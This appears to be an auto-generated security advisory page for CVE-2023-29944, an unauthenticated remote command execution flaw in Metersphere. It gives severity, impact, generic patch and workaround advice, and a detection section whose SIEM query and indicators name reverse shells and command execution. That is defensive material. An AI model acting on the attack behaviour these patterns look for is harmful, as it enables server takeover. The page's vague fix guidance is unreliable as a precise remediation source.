CVE-2023-29944 – Metersphere v1.20.20-lts-79d354a6 contains a re... (How to Fix)

Q: What is the severity of CVE-2023-29944?

CVE-2023-29944 has a CVSS score of 9.8 (CRITICAL). Metersphere v1.20.20-lts-79d354a6 contains a remote command execution vulnerability in the custom code snippet function of the system workbench. Attackers can execute arbitrary system commands, potentially gaining full control of affected servers. Organizations running vulnerable Metersphere instances are affected.

📋 TL;DR

Metersphere v1.20.20-lts-79d354a6 contains a remote command execution vulnerability in the custom code snippet function of the system workbench. Attackers can execute arbitrary system commands, potentially gaining full control of affected servers. Organizations running vulnerable Metersphere instances are affected.

💻 Affected Systems

Products:

Metersphere

Versions: v1.20.20-lts-79d354a6

Operating Systems: All platforms running Metersphere

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default configuration of the affected version. Any instance with the custom code snippet function enabled is vulnerable.

📦 What is this software?

Metersphere by Metersphere

View all CVEs affecting Metersphere →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to execute arbitrary commands, install malware, exfiltrate data, pivot to internal networks, and maintain persistent access.

🟠

Likely Case

Attackers gain shell access to the Metersphere server, allowing them to steal credentials, manipulate test data, and potentially access connected systems.

🟢

If Mitigated

Limited impact due to network segmentation, strict access controls, and monitoring that detects exploitation attempts.

🌐 Internet-Facing: HIGH - Remote exploitation without authentication makes internet-facing instances extremely vulnerable to automated attacks.

🏢 Internal Only: HIGH - Even internal instances are vulnerable to insider threats or attackers who breach perimeter defenses.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

The vulnerability allows remote command execution without authentication. Public proof-of-concept references exist, making exploitation straightforward for attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check Metersphere GitHub repository for latest secure version

Vendor Advisory: https://github.com/metersphere/metersphere

Restart Required: Yes

Instructions:

1. Check current Metersphere version. 2. Update to latest secure version from official repository. 3. Restart Metersphere services. 4. Verify the fix by testing the custom code snippet function.

🔧 Temporary Workarounds

Disable Custom Code Snippet Function

all

Temporarily disable the vulnerable custom code snippet function in the system workbench

Modify Metersphere configuration to disable custom code execution

Network Access Restrictions

all

Restrict access to Metersphere interface to trusted IP addresses only

Configure firewall rules to limit access to Metersphere port

🧯 If You Can't Patch

Implement strict network segmentation to isolate Metersphere from critical systems
Enable comprehensive logging and monitoring for suspicious command execution attempts

🔍 How to Verify

Check if Vulnerable:

Check if running Metersphere v1.20.20-lts-79d354a6 and test if custom code snippet function allows system command execution

Check Version:

Check Metersphere web interface or configuration files for version information

Verify Fix Applied:

After patching, attempt to execute system commands through the custom code snippet function to confirm they are blocked

📡 Detection & Monitoring

Log Indicators:

Unusual system command execution in Metersphere logs
Suspicious process creation from Metersphere user
Failed authentication attempts followed by command execution

Network Indicators:

Unexpected outbound connections from Metersphere server
Reverse shell connections from Metersphere port

SIEM Query:

search 'Metersphere' AND ('command execution' OR 'reverse shell' OR 'system call')

📊 Metadata

CVE ID: CVE-2023-29944

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: May 8, 2023

Last Updated: January 29, 2025

🔗 References

https://github.com/metersphere/metersphere Product
https://hacku.top/wl/?id=N67LxQL238Tsw9PDok5fy8tihEO0jI7L Exploit
https://github.com/metersphere/metersphere Product
https://hacku.top/wl/?id=N67LxQL238Tsw9PDok5fy8tihEO0jI7L Exploit

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-29944, you might also want to check these: